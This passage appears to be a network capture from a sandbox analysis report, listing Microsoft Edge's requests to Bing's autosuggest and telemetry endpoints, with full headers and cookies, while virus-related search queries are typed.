GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aviru%2Ci%3A15%22%2C%22AsResponseLength%22%3A%22745%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144342901%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22virustotal%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144342901%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviru%2Ci%3A15%2Cig%3A63EB1BDA16F34E5CB42DE71DE2763765%22%2C%22AnswerInfo%22%3A%22MB%3B10%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144342901%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avirus%2Ci%3A17%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144343300%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avirus%2Ci%3A16%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144343348%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avirus%2Ci%3A16%22%2C%22AsResponseLength%22%3A%22743%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144343507%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22virustotal%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144343507%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avirus%2Ci%3A16%2Cig%3A79911AD6BC47492BB6CF4680F8D2B7C7%22%2C%22AnswerInfo%22%3A%22MB%3B10%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144343507%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruse%2Ci%3A18%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144343520%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:44 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144344.8b96645
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=viruses&cp=7&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=viruses&cp=7&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Length: 680
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163d8ba434c70825a37616285b45d
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-jIOvscz9jRHImVwHZpHyF+umgrHFcMRZWV1TXJChBUE='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:44 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144344.8b97ed5
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aviruse%2Ci%3A17%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144343521%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruse%2Ci%3A17%22%2C%22AsResponseLength%22%3A%22780%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144343655%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22viruses%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144343655%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruse%2Ci%3A17%2Cig%3AEA1BBF1F63C841228939DB8862762F02%22%2C%22AnswerInfo%22%3A%22MB%3B7%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144343655%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%2Ci%3A19%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144343744%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%2Ci%3A18%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144343746%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%2Ci%3A18%22%2C%22AsResponseLength%22%3A%22680%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144343895%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22viruses%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144343895%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%2Ci%3A18%2Cig%3AA2F430D7A9D44ACD8221E43A24CA79DF%22%2C%22AnswerInfo%22%3A%22MB%3B7%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144343895%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aviruse%2Ci%3A17%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144343521%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruse%2Ci%3A17%22%2C%22AsResponseLength%22%3A%22780%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144343655%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22viruses%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144343655%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruse%2Ci%3A17%2Cig%3AEA1BBF1F63C841228939DB8862762F02%22%2C%22AnswerInfo%22%3A%22MB%3B7%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144343655%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%2Ci%3A19%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144343744%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%2Ci%3A18%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144343746%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%2Ci%3A18%22%2C%22AsResponseLength%22%3A%22680%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144343895%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22viruses%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144343895%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%2Ci%3A18%2Cig%3AA2F430D7A9D44ACD8221E43A24CA79DF%22%2C%22AnswerInfo%22%3A%22MB%3B7%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144343895%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:45 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144345.8b980de
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=viruses%20g&cp=9&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=viruses%20g&cp=9&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Length: 462
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163db8c93439287ecd559d1b602b9
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-QkkbJD6PmarcsX6m4eUztICWBUWOiaTU7QdQA9pnhJI='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:47 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bf777b5c.1728144347.8b987a0
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=viruses%20gi&cp=10&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=viruses%20gi&cp=10&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; 